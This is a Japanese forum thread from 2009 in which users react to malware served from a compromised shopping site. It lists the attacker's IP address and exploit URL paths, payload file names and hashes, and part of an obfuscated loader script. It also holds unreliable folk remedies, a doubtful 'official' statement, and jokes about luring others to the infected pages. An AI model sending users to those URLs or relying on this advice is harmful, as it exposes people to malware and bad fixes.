>>504
おまえはアホだ
安心しろ

つまんね

>>418
geno開いたことないのに動いてる・・

>>507
そりゃconimeくらい動くだろｗ

>>506
言ってる意味がわかんないならとっとと再インスコでもすれば？

avast!で知らずに踏んだらAcrobat勝手に立ち上がったと思ったらavast!が警告出した。
ファイルを移動させて確認するとdosのコマンド？らしきファイルとEXEの二つのファイルが隔離されてた。
改めてそのそのファイルを検査すると警告がでた。
気持ち悪いのでavast!のフルスキャンかけたら、当然のごとく移動したファイルで警告出したから削除。

プロセス確認するもcmd.exeもconime.exeの起動もなし。
なんかすっきりしねぇ。

conime.exeでググれ。ビクつくな

つまんね

動いてるプロセスを一個ずつググるのは基本だよね

http://www.altech-ads.com/product/10001408.htm
ここのウイルス検知能力は割と高いのでしょうかね？
やってみたら数個感染していたけど。

8.1.4は最新じゃないのか？
更新押しても最新と出る

>>515
9.1.0

レタスのベンチ完走しないんだが

>>512
やーいアホ

私operaだけどnoscript余裕でした

踏んだけど3秒で閉じたからセーフ

avastで助かった
今avgとavastでウィルスチェック中
同時進行でspybotも

なんもなんねぇ
って思ったけどそもそもAcrobat入れてなかった

それは紛れもなくセーフ

アクロバットリーダーってなに？火狐最新、ウインドウズアップデート最新、アドビリーダー9.1で踏んだら火狐がおちたけどやばいの？

被害者数はどれぐらいになるんだろ

もう怖くてニュー速すべてのURL踏めない

>>524
アクロバットリーダー　＝　アドビリーダー

ウィルスバスター（笑）やらの調子悪いな、と思ったらgenoにアクセスしたのが原因だったんか
復元でどうにか元に戻せたみたいだけど、バックアップとって後日再インストールすっかな

バスターとかマゾかよ

>>526
GENOにとばされたら嫌だからね。

>>521
同時進行とか…

>>521
spybot使ってるやつってまだいたんだ

やばい。 >>524

やばい。 >>524

やばい。 >>524

大事なことなので三回言いました。

アクロバット入れていなかったけどGENOで昨日買い物してしまったんだよな
avastでスキャンしても何も出てこなかったけどやばいかな

>>533＼(^O^)／
教えてくれてありがとう。クリーンインスコすれば問題ないよな？いまからするわ

最近検査してなかったからスキャンしたら全然関係ないトロイが検出された
正直焦った

なんか騒いでるのν速だけじゃね
+じゃスレもないし
vipじゃ祭りでもない
踊らされすぎじゃないのか・・・

こんな状態で買い物する勇者は居るのか？
GENO使うような人は情弱層とは違うような・・・

土日売り上げ0とかｗｗｗ
当分売り上げ落ちるだろうし、中の人は放置プレイなのか？

4年ぶりにクリーンインストールするかな。

>>534
GENOで買い物したのであれば感染してなくてもGENO側から漏洩の危険性あると思う。

>>538
マゾなんだろう

統合DVD作るのﾏﾝﾄﾞｸｿ

>>537
VIPはともかく＋でスレ立つわけねぇだろ

寝ていた連中が起き始める頃だな
被害者増えそう

害の無いウィルスは存在しても問題ない

NOD32　定義データベース3988で検索中だが心配なってきたな

クリーンインストールしたほうが手っ取り早い気がしてきた

対応セキュリティソフトのまとめは？

>>546
3988じゃ非対応

>>538
お詫びすらしないよ
多分

>>548
非対応とな・・・
クリーンインストールしたほうが早そうだな

ASUS Eee PC 900A 19990円って欲しいな。

俺平気なんだけどｱｸﾛﾊﾞｯﾄが5.0だから？

で、そろそろ踏んでも痛くない予防・対策法はまとまったの？
・Adobe Reader/Acrobat/Flash Playerを最新版にする。

これ以外にあと何ある。

今から統合DVDつくるのめんどくさいんでXPSP3のDVD無償配布してください

PFの使用量って通常どんなもんなの？

>>552
windows98？

明日あたり、PCWATCH、ITMedia、ヤフTOP、GIGAZINEあたりのネタ確定。

>>553
アドベ関係を全削除

アドビ入れてなかったら問題無いの？

誰か凸電かメールしてないのかね

間違えてアクセスしてもつながらないように設定しとくといいよ

>>553
俺AdobeReaderなしFlash最新版でその上Javaスクリプトoff、ActiveXもoffで踏んだのに感染した
ちなみにセキュリティソフトはNIS2009
今の所どんな対策しても感染は防げないんじゃないか

放置する理由がわからん
土日返上もんだろ・・・

四カ所位に検体として送ってみたけど一件返事来た

レックスマークのスタートアップとプロセス削除してる時に一瞬黒窓が開いた
と思ったらconime.exeが常駐してました。
conime.exe自体はコマンドプロンプトを開いた時に読み込まれる物のようだが、
なんでこのタイミングで…？

WHOIS rezult?ti dom?nam/IP adresei: 94.247.2.195
inetnum: 94.247.2.0 - 94.247.3.255
netname: ZLKON
descr: ZlKon
country: LV
role: ZlKon HostMaster
address: Lilijas iela 4-74
address: Riga, LV-1055
address: Latvija
phone: +371 26330593
admin-c: AD5952-RIPE
tech-c: AD5952-RIPE
nic-hdl: ZK508-RIPE
mnt-by: ZLKON-MNT
source: RIPE # Filtered
abuse-mailbox: [email protected]

>>565
同じ症状だ・・・一瞬何かが開いたと思ったらプロンプトだったか
conimeも確認

role: DATORU EXPRESS SERVISS HostMaster
address: 18. novembra street 319C
address: Daugavpils, LV-5413
address: Latvia
phone: +371 26631339
fax-no: +371 65420725
remarks: Information: http://www.pcexpress.lv
remarks: Questions: [email protected]
admin-c: IV745-RIPE
tech-c: IV745-RIPE

ブラウザとプラグインだけ再インスコじゃダメなの？

>>562
感染したってどうやってわかった？

>>569
泥棒が家の中にいるのにドアだけ変えればおｋ？
と言ってるようなもの。

genoのサイトを開くと以下のURLが呼ばれるんだが

　　94.247.2.195/news/?id=100　(IEの場合こっちが呼ばれる)
　　94.247.2.195/news/?id=101　(それ以外の場合こっちが呼ばれる)

うちの環境ではどちらを開いても以下のコードしか出てこない。

　　// No news...<script>
　　var t=new Date(1148027392000);document.cookie="miek=1; expires="+t.toGMTString()+"; path=/";
　　//</script>

ただcookieを書き込んでるだけ。よって何も起こらない。
しかしどうも前スレの報告によると、このURLにPDFやswfをダウンロードさせるコードが含まれてる場合もあるみたいなんだよな。
とりあえずうちでは攻撃が確認できないので、これ以上の解析は無理だ

とりあえずルーターでIPフィルタかけてみたら
やっぱりゲノのサイト繋がらないね
まさかラトビアの鯖借りてるワケでもなかろうに・・・

ウインドウズが起動しなくなってしまった
窓の画像出て読み込んでるところまでは行くんだが
どうすればいいの？；；

>>574
safe modeでやってみたら？

くそーー
感染してるか分からんからネットショッピングとかパス必要なこと一切できないじゃん！
誰か早く詳細を！

>>570
アクセスしたらマウスの動きが重くなったんで、おかしいなと
そんでnetstatコマンド打ったら94.247.2.195と通信してた
そしたらコマンドプロンプトが突然落ちた
その後タスクマネージャ見たらconime.exeが動いてた

>>577
二行目でアウトだが
conimeはコマンドプロンプト開いたら一緒にあがってくるものだぞ

>>577
cmdで日本語つかうならconime.exeは動くっしょ

>>572
94.247.2.195/news/?id=100 のソースは
<script>
var a=new Array(43,38,13,7,25,1,60 長いので以下略
);eval(unescape('85cvaSUr%20sHFZ%3D"HFZ",k%3D 長いので以下略
cs);').replace(/Eu|SU|zbn|HFZ|85c|G7x|4Nr|Z0/g,""));
//</script>
ってなってる。
これを解読すると

・94.247.2.195/news/?id=2 をPDFとして開く
・94.247.2.195/news/?id=3 を開く

になる。というのは前スレ207で報告したとおり。

ユーザエージェントによって中身を切り替えてるんかね

>>577
詳細感謝。
ってことは上でも言われているようにconime.exeが動いているかどうかで感染が判断できそうだな。

しかし再インスコめんどいな
メーカー製PCのリカバリディスクからXPSP3適用済みのインストールCD作る方法ないのかな
余計なソフトとか全部省いてOSだけのやつ

>>571
なるほど、ドア通る時に悪さするんじゃなく中に入っちゃってんのか

これがキーロガーだったらOS再インスコしたところで後の祭りだよね

ここは感染するのを楽しむスレだろ？




























俺も感染した

カスペならオンラインウィルススキャンでも検知できる?

>>578-579
cmd.exeはその時点で落ちてたんだけど、cmd.exe終了してもconime.exeのプロセスは残るのかな

conime.exeは問題ないだろ

>>585
わかってんな

conime.exeは、起動後初めてコマンドプロンプトでIMEを有効にした瞬間に起動する
cmd.exeを閉じても残る

やったreader9.0入手したから感染できた。

>>587
残るんでタスクマネージャーから終了させるといい

avastならセーフなのか
ノートン解雇してavast雇用してスキャンするか。

>>581
cmd.exe立ち上げた覚えないのにconimeが動いてたらアウトだろうね
感染の段階で裏でcmd.exe立ち上がるっぽい

やった感染できた

genoまだなんも対応してねーの？

こいつは感染したPCのフォルダとかデータとか、差したUSBメモリのAutorun.infに何か悪さするウイルス？
そうじゃないならファイルを外付けHDDに退避させてリカバリでおｋだよね。

やっぱりなんともない俺のﾒｲﾝPC
XPでｱｸﾛﾊﾞｯﾄ5.0

どういうタイプのウィルスかわかってないあたりすげぇな
まさに未知子

>>585
他人に迷惑かけるな、カス

>>580
一応Win2k上でIEとFirefox、UA偽装してIE7 on WinXPを試してみたんだけど
どれも同じ結果しか返って来ないんだよな…
ランダムに返してるわけでもないだろうし、謎。

かってにｃonime.exe動いてた。アウトっぽい
火狐とAdobeをアンインストして、フォルダも全部削除してから、
火狐とFoxitを再インストールしたらｃonime.exe出なくなった

やけにFOX落ちるなっておもたら、ウィルスですかい
大丈夫なんかね

バックアップ取るためにいらないファイル消してたら
いきなりデータ実行防止が働いてexplorer.exeが落ちた
ついでにdrwtsn32もエラー落ち
なんだかオラワクワクしてきたぞ

NoScriptの偉大さがやっと理解できた

netstatやったら
http://ja.wikipedia.org/wiki/%E3%82%A2%E3%82%AB%E3%83%9E%E3%82%A4%E3%83%BB%E3%83%86%E3%82%AF%E3%83%8E%E3%83%AD%E3%82%B8%E3%83%BC%E3%82%BA
ここと通信してたんだけど関係ないかな

94.247.2.195とは通信してなかったけどなんか怖いな

>>572
ただのテキストにアクセスしてるわけじゃないんだし呼び出し元の状況で幾らでも書き換えできるだろ

ネットにアクセスする時は、vmwareにインストールしたバーチャルPCから
アクセスしてるから全然怖くないけどなｗ

>>602
conime.exe自体は悪さしてないと思うよ
感染の段階で裏でcmd.exeが動くんで、一緒にconime.exeが立ち上がってそのまま残ってるだけじゃないかな
実際俺は再起動しただけでconimeは消えたよ

NoScript入れてたけど、genoを許可してたから意味ねぇｗ

>>553
近づかないのがデフォでしょ。普通は

システムの復元をしたら、削除したはずの思い出のファイルが蘇ったんですが…

XPならデフォで起動時にautoexec.batを処理してるから
殆どの人にconime.exeは残るんじゃね？

?id=100の時は
// No news...<script>
var a=new Array(51,42,(以下コードがずらす゜らと…

?id=101の時は
// No news...<script>
var a=new Array(32,24,(以下コードがずらす゜らと…

id=xxxでいろんなパターンがあるようでつ

感動のシチュエーションですね。

>>608
仮想PCでも情報は抜かれるわけだが
ID/パスワードを使うアクセスは一切してないのか
すごいな

http://hetarei.blog62.fc2.com/blog-entry-54.html
を見てきたんだが、誰か8lv.exe持ってない?

システムの復元ってデスクトップも元に戻るのか…。

>>617
そのソフトウェア、もしかしてウィルスじゃ……。

感染してる場合って、どのプロセスが94.247.2.195と通信するの?

感染してるっぽい人は、管理者権限でコマンドプロンプトを開いて、

netstat -fb

してみてくれないかな？

>>587
残るよ。いったんシェル立ち上がると、てめーできるまでそのexeは生きてる。
まあなんのシステムも消費せずひっそりとしてるだけだけど。
びびるようなものではない

どうやらXPのみでおこってるらしい？

>>616
常用してる奴はそうだろうけど、
砂箱的な使い方してる奴なら問題無いだろ？

>>620
やり方教えてください；；

C:\に何か変なファイルがなければ大丈夫っぽいな

>>620
今はリカバリ中だから調べられないけど、踏んだ直後に-anoオプションでプロセスID見たら、IEだったよ

http://up2.viploader.net/pic/src/viploader969337.png
なんぞこれ

というかIDとかパスワードって何かのログインするときに入力しただけだろ？
その情報とかってレジストリに残るものなの普通？

http://malware-web-threats.blogspot.com/search?updated-max=2009-04-04T22%3A57%3A00-07%3A00&max-results=2
に詳しく書いてあるね
8lv.exeって適当につけた名前なのかな

>>624
XPで管理者権限のあるユーザーでログインしているなら、コマンドプロンプトを
開いて、netstat -fb[Enter]って打つだけ。
Vistaなら、[スタート]メニュー → [アクセサリ] → [コマンドプロンプト]で
右クリックして「管理者として実行(A)...」を選択

>>626
IEっすか。んじゃIP以外で判別付かないのね。

>>609
再起動しても、火狐立ち上げる毎にconime.exeが出てきていたぞ

>>627
やっと感知できるようになったんだな

>>629
そこにあるhxxp://94.247.2.195/news/?id=のどれか忘れたけど踏んだら「iNo.exeをどうするよ？」
と火狐がたずねてきた。

os9&wamcomで踏ん付けたら、ブラウザ終了させてもメモリー開放されなくなった
ブラウザ入れ直したら直ったけど、まさかこの環境でも抜かれたり…

>>630
ｆオプションって。。。

誰かVIPにスレ立てた？
あいつら釣れるんじゃね

>>630
XP の netstat に f なんてオプション無いぞ!!

昨日知らずにGenoチェックしたけどなんとも無かった

Firefox使ってるやつは、最低AdbrockとNoScriptぐらい入れとけば？

>>636
昨日の
http://takeshima.2ch.net/test/read.cgi/news4vip/1238857920/
俺はそれで昨日ここに来たよ

>>635
ん?なんか変?
名前解決できなければIPで表示されるはずだけど。
hosts書き換えられたりしてる可能性を考慮して、-nbとかの方がいいのかな。

>>639
レス数伸びてないな…
「デジカメに詳しい奴ちょっと来い」で立てたほうがよかったかもね

>>639
総レス数 17って全然じゃねーか

心配なやつはこれ入れてスキャンしたら？
常駐型じゃないから他のウィルス対策ソフトと同居できる。
http://www.altech-ads.com/product/10001408.htm

>>637
すまん。んじゃnetstat -nbで

http://takeshima.2ch.net/test/read.cgi/news4vip/1238922149/

一応立っててた

>>643
それ誤検出が多いんだろ？

>>646
そうだよ

これゲノは対策とか発表まだしてないの？一回だけ踏んですぐ閉じたがなんか
調子悪い。さっき急にブルースクリーンになって強制終了させた。マジでどうしたら
いいんだよ

>>646
ヒュースなんちゃらで疑わしいのも拾うらしいな。
判断が厳しいってだけでしょ。
今回のような場合は頼もしいじゃん。

>>638
別にそんなものいれてないがなんともなかった

94.247.2.195/news/?id=10のLk8.exeって何

LUNAで一瞬見たけど　１分程度だがなんともないんだが
症状として　重たくなるとかぐらいなのか

zip猿共がウザいから短縮URLでブラクラ踏ませるぞー

>>644
やって見たんですけど
どういう画面だと危険なんですか？
なんかアクティブコネクションとか英語で出て
その下にローカルアドレスとか似たような文章が何行かに渡って表示されてますけど・・・

Vistaの場合リソースモニターでどのプログラムがどこと接続してるか見れるぞ

>>654
外部アドレスに94.247.2.195があったら感染してるっぽい。
XPだとForeign Addressだったかな。

で、その下あたりに[xxx.exe]って通信を行っているアプリ名が出てるはずなので、
もし、94.247.2.195と通信してるようなら、そのアプリ名を教えて。

>>651
うちの場合、g0N.exeが落ちてきたな。
http://www.virustotal.com/jp/analisis/8ed2ddb5a2db20507144b50bb35f6553

>>651
>>629

108lv.exeだったら許した

ファイル名はランダムに変化するのかな

そういう手法はウイルスバスターも使ってた気がするが

>>415
それのスキャン4種類あるみたいだけど、どれでしたら出てきた？

NIS2009
トレンドマイクロ オンラインスキャン
でなにも検出せず
いまavast最新版でスキャン中なんだけど

kernel32.dll
winsock.dll
wsock32.dll

この3個検出して隔離されたんだけど
これ必要なもんじゃねーの？

>>657
>>658
�d

>>661
下の一番時間かかるやつでやれば確実

>>664
まー、フルスキャンが確実だ罠
面倒だけど背に腹は代えられないからやってみっか

>>501

\_rikonと打ち込んでください

>>662
System32でなければ偽物の可能性が高いけど、場所は？

>>662
OS再インスコしなおせ

>>651
ラトビアの国から・シーズン８

最新版のマカフィーでフルスキャン中だけど、なんにも出てこない・・・
マジでどうしたらいいんだ

>>662
複数検出されて、本来あるべき以外の場所にあったらウィルスかもな。

どうしようもないよ
何もしなくていい

>>501
クリーンインストールすればいい

>>670
さっさとデータ逃がしてクリーンインスト

>>667
あーSystem32だ
誤検出か？

メモリのベンチテストでも勝手にされてるかと思ったわ

新型おそるべし。セキュリティ使ってる人の方が
安心してしまって自己防衛せず、やられてるんだろうね。
バスター・ノートン今だ対応できず。カスペも検知はできるが駆除はまだ。

これってAdobe Readerが怪しくね？
仮想マシンで試したらAdobe Readerインストールする時点でAviraが騒ぎ出すんだが・・・まぁこれはこれは誤検知だよな
さらにgeno-webにアクセスするとAviraは無反応、糞重い。そしてOSの挙動が不審に。
ちなみにAdobe Readerインストール前にgenoにアクセスしても実害はなかった模様

>>662
そのファイルが汚染されてるってことはないのか？

Adobe Readerは入れてないからセフなんだけどFlashでもやられるんだよな、FlashPlayerの最新版ていまはいくつ？

ていうか、最新版なら感染なしなのか？
とりあえずカスペでCドライブからは何も検出されなかったけど…

>>675
dllに感染してるんじゃないの
とっとと再インスコした方が幸せになれると思うが

avastアップデート＆スキャン
リーダー＆フラッシュをアップデート
ATFクリーナー使用

プロセス数38
conime無し
メモリ使用量550MB
挙動に異常なし

終わったのか？
頭がおかしくなりそうだぜ

>>678
＞ちなみにAdobe Readerインストール前にgenoにアクセスしても実害はなかった模様
この時点でなんか仕込まれて
＞仮想マシンで試したらAdobe Readerインストールする時点でAviraが騒ぎ出すんだが・・・まぁこれはこれは誤検知だよな
この段階で発動した可能性は？

感染してるdll捨てて代わりのdllを他の人から貰うなりして入れても駄目なもんなの？

>>683
Adobe Readerインストールする前はgenoにアクセスしてないよ！

>>685
なんだ

参考までに
PDFのやつ
MD5:af28f3bc9424a3da7ff8bc84740bce93
SHA1:c96f0e74a9adb446e233bfb94fe1bfc11bc5e49b

Flashのやつ
MD5:f2cbb3bd0abc2413000f5b04f8bf3305
SHA1:5adcf9a489c85ef1065b515c5772f21225a5e4c7

>>662 チェストのヘルプをよく嫁。

>>662
http://www.dll-files.com/dllindex/dll-files.shtml?winsock
http://www.dll-files.com/dllindex/dll-files.shtml?wsock32
http://www.dll-files.com/dllindex/dll-files.shtml?kernel32
これを入れたほうがいいんじゃないのか

>>662

それはチェストにバックアップされたシステムファイル。
「感染していたファイル」カテゴリを選択してみ。

firefox 3, flash 10, foxit reader 3.0 build 1300くらい, NOD32で見たけど、
a square freeで検出されなかった。感染してないっぽい。

>>683
それはgetPlusのnp_gp.dlだろ。

んなことよりFLASHは関係なくね？

だれも電話で知らせてないの？？

カスペで検知できない・・・・・・だ・・と？？

セーフモードでも立ち上がらん・・・
別のHDDにOSインスコしてウイルススキャンしても発見できない。
どうしよう；；；；；；

>>693
>>490
通販サイトのことはわからないんだとさ

今回アクセスしていない人も、ここで一度でも商品を買った人は
個人情報がばら撒かれる可能性が高いからね

>>690
感染していたファイルにはありませんでした
ただのバックアップですか？
具合悪いようならdllいれかえてみます

早とちりスイマセン

所で、a square freeの右栗スキャンで、g0N.exeをスキャンしても無反応なんやが
なんでだろ。無論定義等は最新。VirusTotalで使ってるのと違うのかな。

>>695
もうあきらめて、そのクリーンインスコしたOSをつかったら？
ディスク見えてるようだからデータの引き上げとかもできるでしょ

>>695
諦めろカス

マカフィー最新版フルスキャン完了。やっぱりなんにも出てこない・・・
ゲノはなんでなんにも発表とかしないんだ？

>>702
最初からウイルスなんて無かったんだよ
まだわからんの？

>>702
管理者へ連絡していないんだろうな
秋葉の店員も危機管理意識が全くないみたいだから
ネットショップの管理者も同じなんだろう

家電量販店でかったPCって普通インストールディスク付いてないものなの？

やっぱスクリプトは普段から来ておくべきだな
改めて思い知ったよ

>>636
zipスレの猿共に踏ませろよ

オォーィオイオイオイ、はよなんとかせーやゴエロ（若本規夫ボイス）

>>656
94.247.2.195とは出てません。
感染してないと言うことでしょうか？

俺もgeno除いたけどセフセフだったから傍観気取ってたけど
今日、別のウィルス踏んでハードディスクがフォーマットされてしまったでござる

>>705
最近のPCはHDDに格納されてる、リカバリディスクは有料だとか

結局ウイルスの挙動の全容もよくわからん
GENOひらいたらAcrobatやFlashをオーバーフローさせて、任意のコードを実行
その後94.247.2.195と通信
それでどうなるんだ？再起動してもプロセス常駐したりはしないんでしょ？

GENOからなんの連絡もないんだけど、買い物とか登録してないとダメかね？

>>710
お間抜けちゃんでござるなぁ

>>710
何のエロゲ落としたんだよ

感染したからリカバリしようと思ってリカバリＤＶＤ出したら・・・・




犬がＤＶＤ思いっ切りかじりやがった！

そんなことより明日の体育で使うオレの体操着にウチのネコがウンコした件について

春休みだろ

>>630
これやったら
こんなのでたけどIPとかかかれてないけどこれセフセフ？


アクティブな接続

プロトコル ローカル アドレス 外部アドレス 状態

個人情報漏れても大事にはならなくないか
PCの重要ファイル漏れるとやばいけど

っていうかどこかからアクセスしてくるってどうやってわかるんだ？
ファイヤーウォールか何かか？

>>720
なるだろ

>>721
tcp　モニタ　ソフト

踏んでないけど寂しいから俺もOS再インストールするよ

トレンドマイクロに一応報告してきた

avast!が　94.247.2.195　への通信を遮断しました　と出したな

なんかこんな風に機能したのって始めてかもしれん
ちゃんと動いてたんだなこれ

誰かが言ってたように漏れたらまずい情報をPC上に置かない事が最強のウイルス対策か

>>721
TCP Monitor Plus

>>727
P◯P専用機とかなら分かるが普段使ってるWEB機じゃそれは難しい

>>727
普通置いてないだろ？
各種パスは紙に書くし、パスワード記憶とかも使わないし。

ネット閲覧を抑制するのが一番いい。お前らは一日中とかやりすぎなんだよ

とりあえずavastで遮断してくれた人は勝ち組ってことで？

ＶｉｓｕａｌＳｔｕｄｉｏ２００８のインストールとかにめちゃくちゃ時間かかるのに
再インストールとかやってらんないんだけど。。。
マジ、やってらんねー。

>>661
俺の場合、expert pdfかjane styleがある
program files03か05か04だけスキャンしたら出てきた。たしか
windowsフォルダとかはやってない

すぐ駆除しちまったから、詳しいことは忘れちゃった。

ところで誰を訴えればいいの？

マルウエアがどうのこうのって出たな

週間アスキーとか新聞広告出してなかったかここ？
ホントにウイルスならやばくね？？？？

まだ直らないの？
XPのDSP買いたいんだから早くしてよ

IPアドレス 94.247.2.195
ホスト名 hs.2-195.zlkon.lv
IPアドレス割当国 ラトビア ( lv )

ラトビアはバルト三国の一つ

お前ら無様過ぎだろｗ
やはりノーガード最強だなｗｗｗｗｗ

>>656
おー、ロクにアップデートもしない状態で偽装ｊｐｇ踏んじゃって
あせったけどセーフだったか
今日からマメに更新するわ

genoはどう対応するんだろ

avastを入れた人いる？

なかったことにするだけだろ

>>741
これ幸いとノートンとバスターの安売りするんじゃね？

>>742
今回のような事態にあったら怖いので入れた

まだGenoのサイトは直ってないの？

>>743
もしそうだったら、客を馬鹿にしてるとしか思えない。
ＦＤＤしか買ったことないけど。

617 名前： 名無しさん [sage] 投稿日： 2009/04/05(日) 20:05:12 0
ご迷惑をお掛けして申し訳ありません。 
今回の件は原因を調査中です。 
ただ、ウイルスでは無いので騒がなくて良いです。 


これ本物かな？
これだけ放置して騒がなくて良いって・・・

avastたんはいい子

こっちにもavast一個たのんます

黄色い先生も撃退してくれたぞ（´･ω･`）

ESETはどうだろうか

avastからantivirに変えたけどまたavastに戻る日が来ようとは

ノートンとバスターのシェアを奪いたい勢力の策略か
最も利益を受けるのは誰か
なぜ土曜の朝にGenoなのか

これはどうみてもウイルス
しかもかなり性質の悪い
今の状況でGENOで買い物どころかアクセスするのはNG
これで明日になっても謝罪文一つ出さないで通常営業するとしたら
然るべき機関へ通報したほうがいいね
こんなに被害者を出しているんだから社会的制裁を受けるべき

>>754
そうか！Genoでウイルス対策ソフトを買えばいいんだ！！

どんな　症状がでるんだよ　いっこうにわからん

genoに行く服がない

avast最高だな
アクロバットリーダーは起動したけど
固まったりしないわ

ＧＥＮＯはマカフィー売っていたよね？
ちゃんと対応商品は売っているってこと？

Vista SP1、IE7最新版、Flash最新版、Adobe Reader最新版で見たら
感染しないぞ

めったにないことかもしれないけどGENO最悪
しかも謝罪の文章もなし、これは店を構える上でやってはいけないこと
うんと後から抗議されるよりも今の内に謝罪すべき
ま、avast入れてた俺は勝ち組

ちょっと前まで
マカフィーが888円
バスターが2999円で売っていた。

avastは、感染前に94.247.2.195を遮断してるのか、感染後に94.247.2.195を遮断してるのかどっちだ？

>>764
一回目遮断されなかった

>>754
パソコン覚え立ての人が使うよく使うNorton/busterに検出駆除されてしまうような
ウィルス使う方がおかしいだろ、Jk

コマンドプロンプト開いて94.247.2.195と通信してなければおｋって事？

>>767
ぜんぜんおｋじゃない

>>760
マカフィー使ってたけど引っ掛かったって言ってる人いなかった？
999円だかで売ってたね

avastとantivir両方入れてる

>>758
こいつ馬鹿か
genoはネット通販だから外出る必要ないぞ

geno踏んだ後、
再起動したらタスクトレイの中身が極端に少なくなった。
ノートン先生も出てこねえ

>>770
宮城かっけぇww

またChromeの大勝利か

>>774
チョロメ組はその前に負けているw
IRONの一人勝ち

ID変わってるけど>>572です

その後UAを色々偽装して試した結果、ラトビアのサーバが攻撃コードを吐き出すのは
Windows 2000、XP (Me以前は試してない) に限定されるみたい。
Vista、Mac、Linuxに関しては>>572に書いたコードを吐くだけで、何も悪さをしない。

2kとXPに関してはIEとそれ以外のブラウザをサーバ側で判別、
それぞれに対して>>580のように攻撃用pdf/swfを呼び出す。
そんな仕様になっているっぽい

>>772
ちなみにノートン先生再インスコしてもだめ
もし復元ができなかったらあきらめてOS入れ直せ

>>776
マジで？
つまりVista大勝利？！

>>776
XPSP3
IE8
janeから開いたけどpdf、swfは出てこなかった
94.247.2.195/news/?id=2

貧乏人のXP厨涙目ｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ

>>776
ちょっとサブ機（vista）で踏んでこようとか思っちゃったじゃねーかｗ

93.184.71.21
踏んでないのになんかスロバキアと通信してるんだが

4月からバスターからウイルスキラーゼロに変えといてよかったよ。

オペラやスリッパ（だっけ）使ってる情弱どもざまあｗｗｗｗｗｗ
玄人はファイアフォックス一択

>>776
俺Vistaだから平気だったのか

>>782
IPアドレス 93.184.71.21
ホスト名 um10.eset.com
IPアドレス割当国 スロバキア ( sk )

これって踏んだら外付けHDDもやばい？あと2階だから無線LANで繋げてたんだが1階にあるPCとかには危険ないの？

ああESETかサンクス

>>788
東欧無修正かコラ

>>787
よう俺ｗｗｗ

グーグルクロームは安全？

>>791
危険

クロームなんか使ってる奴バカだろ
何抜かれてるかわからん

Vista厨大勝利ってのはマジなんだろうな

>>779
ちょっと試してみたけどやっぱり攻撃コードを吐いてくるね
ただIE6 on 2k上でも読み込みに失敗していたようだから、jsは読み込んでもpdf/swfは読み込まないってことはあるかも
user agentがどうなってるか確認できる？

avastですら反応するのに・・・

おまえら、インターネットオプションのセキュリティで、
制限付きサイトに、ttp://www.geno-web.jp/を登録する作業に戻るんだ！

ここまで放置だと宣伝のためにわざとウイルス仕込んだ疑いがあるな

通信をコマンドぷろんとで確認したが特に怪しいことはしてなかった。最新のフラッシュとadobeだったからかお？？

>>795
よくわからないけど、これのこと？
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

Internet Explorer 8.0
Mozilla It's a Mozilla based browser
4.0 Mozilla Version
compatible Compatibility flag
Indicates that this browser is compatible with a common set of features
MSIE 7.0 Name :
Internet Explorer
Version = 7.0 (MSIE 8.0 in Compatibility View)
Windows NT 5.1 Operating System:
Windows XP
Trident Layout engine for the Microsoft Windows version of Internet Explorer.
4.0 version 4.0
.NET CLR 2.0.50727 .NET installed
Version : 2.0.50727
.NET CLR 3.0.4506.2152 .NET installed
Version : 3.0.4506.2152
.NET CLR 3.5.30729 .NET installed
Version : 3.5.30729

avast反応するけど、1発目は感染!?

最近よくgenoスレ立ってたしな。

>>799
ﾆﾔﾆﾔ

マゾ的には放置中のIE6を再度起動させてフリーズ中のIEをそのままにして　netstat -nb してみたら、
ccSvcHst.exe　が起動して　198.87.182.147 :80　につなげていた。こりゃかんけいないか。

>>804
それアカマイさんですよ

>>802
うんうん。

正直、最近不自然な位にGeno宣伝レスが多かった。
なんかその辺にもカラクリが在りそう。

ぶっちゃけ、あの程度の店の規模で
広告代理店を使ってネットで宣伝活動を行える余裕なんてない筈だし。

一見店側の工作員に見せかけたクラッカー集団の感染者拡大の為の似非宣伝レス活動って感じで。
相当計画的犯行なんだと思う。

>>804
ノートンじゃん

あぁ、先生のかｗ　失敬

この時に踏んじゃったけど大丈夫だったようだ

CPU C2D Ｔ7250、 Vista Businessの15.4型NEC製ノートPCが46000円
http://tsushima.2ch.net/test/read.cgi/news/1238662017/l50
1 名前： カリフォルニア(福島県) 投稿日：2009/04/02(木) 17:46:57.91 yQG9LCm1 ?

昨夜短縮URLで貼られまくってたから結構被害出てるかもな。

踏んでしまったサブ機（バスター最新）で検出されなかったんで、
a-squaredで調べたら高レベル危険度で検出。
ああマンドクセ

しかも直ぐ入金したのに↓届かず発送メールも無い。
CPU C2D Ｔ7250、 Vista Businessの15.4型NEC製ノートPCが46000円

>>776
UAに
compatible; MSIE 7.0; Windows NT 6.0;
を送って
94.247.2.195/news/?id=100
をGETリクエストしてみたが、id=2とid=3への誘導コードが入ってたよ。
Vistaだからといって安心はできないんじゃない？

>>811
genoは平日でも入金から発送まで2日以上がデフォ＆土日休む
で4/2(木)に注文したんなら月〜水あたりに発送だ

なんかこのスレいるだけで、アンチウイルスソフトの優秀さが比較できるな。
しかし、無料のavastが大勝利ってマカフィー使ってるのが悲しくなってくる

>>811
そりゃ心配だね、明日でも直接電話してみたら？

>>814
一例だけじゃわからんよ

>>800
それ。
試してみたがやっぱり攻撃コードが返ってくるようだ。
まだコードをよく検証してないが明示的に読み込まれるわけではないかもしれないので気をつけた方がいいかも

で結局感染するとどうなるんだい？

もう踏んだり蹴ったりっすわ。
サブ機はwinも最新にしてて、変なサイトは絶対行かないマシンなんで、
ライセンス余ってたバスターでいいやって入れたらすり抜けちまってこれだよ。

感染上等のエロサーバーはavastで助かりやがるし・・・

これ踏んだ後Windows Updateできなくなったやついる？
割れでもない普通のXPなんだがうｐだて出来なくなってる…
サービスが起動してないっていうから見てみたけど起動してるし…

Vistaで感染したってやついる？

>>818
これまでのレスを超簡単に取りまとめると、、、

1.最新ではないAcroBatReaderのバージョン8がインスコされているとPC内にPDFがわんさか増殖してHDDを食いつぶす。
2.その際にCPU負荷がとんでもない状況になってブラウザが落ちたり操作不能でリセットボタンを「ぽちっとな」する羽目に。
3.OS再起動するとブルースクリーンになり再インスコする羽目に。

URL踏んだがどうってことない。

いつになったらこのウイルスの情報でるかな？
とりあえずa-squaredでスキャンしたら大丈夫だろうか・・・
これが解決するまでamazon使えねえ

AcroBatReader入れてなかったわ
